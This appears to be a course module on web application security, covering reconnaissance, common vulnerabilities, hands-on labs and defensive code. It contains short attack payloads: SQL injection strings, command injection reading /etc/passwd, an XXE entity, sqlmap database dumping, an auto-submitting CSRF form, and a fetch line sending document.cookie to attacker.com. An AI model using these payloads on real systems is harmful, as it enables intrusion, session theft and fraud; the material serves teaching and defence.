Introduction to Web App Security
Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.
1. Web App Reconnaissance
Information Gathering
- WHOIS Lookup (Domain details)
- Subdomain Enumeration (Sublist3r, Amass)
- Technology Stack Detection (Wappalyzer, BuiltWith)
- Directory Bruteforcing (Dirb, Gobuster)
- Wayback Machine (Historical snapshots)
Tools
```bash
sublist3r -d example.com
# wappalyzer.com is a browser extension / web service for stack detection, not a CLI command
gobuster dir -u https://example.com -w /path/to/wordlist.txt
```
2. Common Web Vulnerabilities
A. Injection Attacks
1. SQL Injection (SQLi)
- Classic SQLi: ' OR 1=1 -- -
- Blind SQLi: Time-based/Boolean-based
Tools: SQLmap, Burp Suite
Example (the query the server ends up running when `admin'--` is supplied as the username):
```sql
SELECT * FROM users WHERE username = 'admin'--' AND password = ''
```
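The following Python is an added example, not code from this guide: it builds the same users query two ways against an in-memory SQLite table (one constructed row) and shows why the concatenated query above is exploitable while the prepared statement recommended under Defensive Measures is not. The plaintext password column exists only for the demonstration; real applications store password hashes.

```python
import sqlite3


def seed_db() -> sqlite3.Connection:
    """In-memory database with one constructed account (sample data, not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Attacker-controlled text is spliced into the SQL string, so a quote in the
    # username ends the literal and the rest of the input becomes SQL syntax.
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Prepared statement: the query text is fixed, and the driver sends the values
    # separately, so "admin'--" is compared literally as a username and never parsed as SQL.
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = seed_db()
    print("vulnerable, admin'-- :", login_vulnerable(db, "admin'--", ""))        # True
    print("vulnerable, ' OR 1=1 -- - :", login_vulnerable(db, "' OR 1=1 -- -", ""))  # True
    print("safe, admin'-- :", login_safe(db, "admin'--", ""))                     # False
```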
2. Command Injection
- Executing OS commands via input fields:
```bash
; cat /etc/passwd
```
3. Cross-Site Scripting (XSS)
- Stored XSS: <script>alert(1)</script>
- Reflected XSS: https://example.com/search?q=<script>alert(1)</script>
- DOM XSS: Browser-side script execution
B. Broken Authentication
1. Credential Stuffing
- Using breached passwords
Tools: Hydra, Burp Intruder
2. Session Hijacking
- Stealing cookies via XSS/MITM
Tools: Ferret, Hamster
3. Default Credentials
- admin:admin, root:password
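Added example (not from this guide) covering the three Broken Authentication items above from the defender's side: salted scrypt password hashing with a constant-time comparison, a per-account failure counter that blunts credential stuffing and default-credential guessing, and a session cookie carrying the HttpOnly/Secure/SameSite attributes that stop document.cookie theft via XSS and plain-HTTP interception. The LoginGuard class, its thresholds and the sample account are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie

MAX_FAILURES = 5          # failed attempts before an account is locked (assumed policy)
LOCKOUT_SECONDS = 900     # lock duration (assumed policy)
SCRYPT = dict(n=2**14, r=8, p=1)

# Dummy record hashed for unknown usernames so that timing does not reveal which accounts exist.
DUMMY_SALT = bytes(16)
DUMMY_DIGEST = hashlib.scrypt(b"", salt=DUMMY_SALT, **SCRYPT)


def hash_password(password: str, salt: bytes = None):
    """Return (salt, scrypt digest); a fresh random salt is drawn when none is given."""
    salt = salt or secrets.token_bytes(16)
    return salt, hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)


class LoginGuard:
    """Password verification plus per-account lockout. `now` is injectable for testing."""

    def __init__(self, now=time.monotonic):
        self._now = now
        self._users = {}      # username -> (salt, digest)
        self._failures = {}   # username -> (failure count, time of first failure)

    def register(self, username: str, password: str) -> None:
        self._users[username] = hash_password(password)

    def is_locked(self, username: str) -> bool:
        count, since = self._failures.get(username, (0, 0.0))
        if count < MAX_FAILURES:
            return False
        if self._now() - since >= LOCKOUT_SECONDS:
            self._failures.pop(username, None)   # lockout window has expired
            return False
        return True

    def login(self, username: str, password: str) -> bool:
        if self.is_locked(username):
            return False
        record = self._users.get(username)
        salt, expected = record if record else (DUMMY_SALT, DUMMY_DIGEST)
        _, actual = hash_password(password, salt)
        ok = record is not None and hmac.compare_digest(actual, expected)
        if ok:
            self._failures.pop(username, None)
        else:
            count, since = self._failures.get(username, (0, self._now()))
            self._failures[username] = (count + 1, since)
        return ok


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session id that scripts cannot read and browsers only send over HTTPS."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # not exposed to document.cookie
    cookie["session"]["secure"] = True     # never sent over plain HTTP (no MITM capture)
    cookie["session"]["samesite"] = "Lax"  # not attached to cross-site POSTs (CSRF defence in depth)
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


if __name__ == "__main__":
    guard = LoginGuard()
    guard.register("alice", "correct horse battery staple")   # constructed sample account
    print(guard.login("alice", "correct horse battery staple"))  # True
    print(session_cookie_header(secrets.token_urlsafe(32)))
```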
C. Sensitive Data Exposure
1. Insecure APIs
- Exposed API keys, tokens
Tools: Postman, Burp Suite
2. Directory Listing
- /backup, /admin accessible
D. Security Misconfigurations
1. Exposed Admin Panels
- /admin, /wp-admin
2. Verbose Error Messages
- Leaking stack traces, DB info
E. Cross-Site Request Forgery (CSRF)
- Forcing users to execute unwanted actions:
```html
<img src="https://bank.com/transfer?amount=1000&to=attacker">
```
F. Server-Side Request Forgery (SSRF)
- Accessing internal services:
https://example.com/fetch?url=http://localhost
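Added example, not part of this guide: a URL check a `fetch?url=` endpoint can run before making the request. It only allows http/https, rejects credentials in the URL and the localhost name, resolves the hostname and refuses loopback, private, link-local and other non-public addresses, so the internal-service request shown above is turned away. The `resolve` parameter is an assumption that lets the example run offline; in production the same address check must be repeated at connect time, since a hostname can change its answer between the check and the request (DNS rebinding), and an allow-list of expected hosts is stronger than this block-list alone.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_internal_address(ip_text: str) -> bool:
    """True for any address a server-side fetch must never contact."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_fetch_url(url: str, resolve=socket.gethostbyname) -> bool:
    """Decide whether a user-supplied URL may be fetched by the server.

    `resolve` maps a hostname to an IP string (socket.gethostbyname by default;
    a stub is passed in the tests so nothing touches the network)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                   # file://, gopher://, etc. are never fetched
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        ipaddress.ip_address(host)     # literal IPv4/IPv6 address
        ip_text = host
    except ValueError:
        try:
            ip_text = resolve(host)    # resolving (rather than string matching) also
        except (OSError, ValueError):  # catches decimal/octal spellings of an address
            return False
    try:
        return not is_internal_address(ip_text)
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ("http://localhost", "http://127.0.0.1:8080/", "https://example.com/page"):
        # constructed resolver: pretend every hostname resolves to a public address
        print(candidate, is_safe_fetch_url(candidate, resolve=lambda h: "93.184.216.34"))
```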
G. XML External Entity (XXE)
- Reading local files via XML:
```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```
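Added example, not from this guide: the standard mitigation for XXE is to refuse DTDs altogether. The parser wrapper below uses Python's stdlib expat bindings to abort on any DOCTYPE or ENTITY declaration before the document is handed to ElementTree, so the declaration above is rejected without ever resolving the external entity. The function names and the sample documents are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """Raised when a document carries a DTD, which is where external entities are declared."""


def parse_xml_no_dtd(data: bytes) -> ET.Element:
    """Parse XML but reject any document that declares a DOCTYPE or an entity."""
    scanner = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE declarations are not accepted (found <!DOCTYPE {name}>)")

    def reject_entity(name, is_pe, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity declarations are not accepted (found <!ENTITY {name}>)")

    # expat calls these handlers as soon as it sees the declaration, so the
    # exception fires before any element content (and any entity reference) is processed.
    scanner.StartDoctypeDeclHandler = reject_doctype
    scanner.EntityDeclHandler = reject_entity
    scanner.Parse(data, True)
    return ET.fromstring(data)


def is_safe_xml(data: bytes) -> bool:
    """Convenience predicate: True if the document parses without a DTD."""
    try:
        parse_xml_no_dtd(data)
        return True
    except UnsafeXml:
        return False


# Constructed sample inputs.
BENIGN = b"<order><item>book</item><qty>2</qty></order>"
XXE_ATTEMPT = (
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    b"<foo>&xxe;</foo>"
)

if __name__ == "__main__":
    print(parse_xml_no_dtd(BENIGN).find("item").text)   # book
    print(is_safe_xml(XXE_ATTEMPT))                      # False
```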
3. Exploitation Techniques
Step 1: Automated Scanning
- Burp Suite (Manual testing)
- OWASP ZAP (Automated scanning)
- Nikto (Vulnerability scanner)
Step 2: Manual Testing
- Intercepting requests (Burp Proxy)
- Tampering parameters (Headers, cookies)
- Fuzzing inputs (Wfuzz, FFUF)
Step 3: Post-Exploitation
- Privilege escalation
- Data exfiltration
- Persistence mechanisms
4. Hands-On Labs
Lab 1: SQL Injection with SQLmap
1. Find vulnerable parameter:
```bash
sqlmap -u "https://example.com/login?id=1" --dbs
```
2. Dump database:
```bash
sqlmap -u "https://example.com/login?id=1" -D dbname --tables
```
Lab 2: XSS Exploitation
1. Inject payload in search box:
```html
<script>alert(document.cookie)</script>
```
2. Steal cookies:
```javascript
fetch('https://attacker.com/log?cookie=' + document.cookie)
```
Lab 3: CSRF Attack
1. Craft malicious HTML:
```html
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>
```
5. Defensive Measures
Secure Coding Practices
- Input validation
- Prepared statements (SQLi)
- CSP headers (XSS)
- CSRF tokens
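Added example, not part of this guide, tying the four secure-coding practices above to the XSS (section 2.A.3) and CSRF (section 2.E) material: a page handler that HTML-escapes the reflected search query, sends a restrictive Content-Security-Policy header, embeds a per-session CSRF token in the transfer form, and a POST handler that verifies that token in constant time and validates the amount and recipient before doing anything. The route names, session dictionary and recipient-id rule are assumptions.

```python
import hmac
import html
import secrets

# Only same-origin scripts may run, so an injected inline <script>alert(1)</script>
# would be blocked by the browser even if escaping were missed somewhere.
CSP = ("default-src 'self'; script-src 'self'; object-src 'none'; "
       "base-uri 'none'; frame-ancestors 'none'")


def issue_csrf_token(session: dict) -> str:
    """Return the session's CSRF token, generating one on first use."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def verify_csrf_token(session: dict, submitted) -> bool:
    """Constant-time check of the submitted token against the session's token."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def render_transfer_page(session: dict, search_query: str):
    """Build (headers, body) for a page that echoes a query and hosts the transfer form."""
    token = issue_csrf_token(session)
    body = (
        f"<p>Results for: {html.escape(search_query)}</p>\n"   # output encoding stops reflected XSS
        '<form action="/transfer" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{html.escape(token)}">\n'
        '  <input name="amount"> <input name="to"> <button>Send</button>\n'
        "</form>"
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def handle_transfer(session: dict, form: dict):
    """POST /transfer: a forged cross-site form carries no valid token and is refused."""
    if not verify_csrf_token(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    amount = form.get("amount", "")
    if not amount.isdigit() or int(amount) <= 0:          # input validation
        return 400, "amount must be a positive integer"
    recipient = form.get("to", "")
    if not (1 <= len(recipient) <= 32 and recipient.isalnum()):   # assumed account-id format
        return 400, "invalid recipient"
    return 200, f"transferred {amount} to {recipient}"


if __name__ == "__main__":
    session = {}
    headers, body = render_transfer_page(session, "<script>alert(1)</script>")
    print(body)
    # The Lab 3 form posts amount/to but no token, so it is rejected:
    print(handle_transfer(session, {"amount": "1000", "to": "attacker"}))   # (403, ...)
```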
Security Tools
- WAFs (ModSecurity, Cloudflare)
- DAST/SAST Scanners (Checkmarx, SonarQube)
- Honeypots (Glastopf)
6. Bug Bounty & Ethical Hacking
Platforms : HackerOne, Bugcrowd
Methodology:
1. Recon
2. Vulnerability Scanning
3. Exploitation
4. Reporting
Conclusion
- Web app hacking involves recon, exploitation, and post-exploitation.
- OWASP Top 10 is a must-know for pentesters.
- Automated tools + manual testing = Best approach.
🔹 Next Steps:
Module 8: Wireless Network Hacking
- Practice on DVWA, WebGoat.
- Try HTB, TryHackMe web challenges.
- Learn advanced Burp Suite techniques.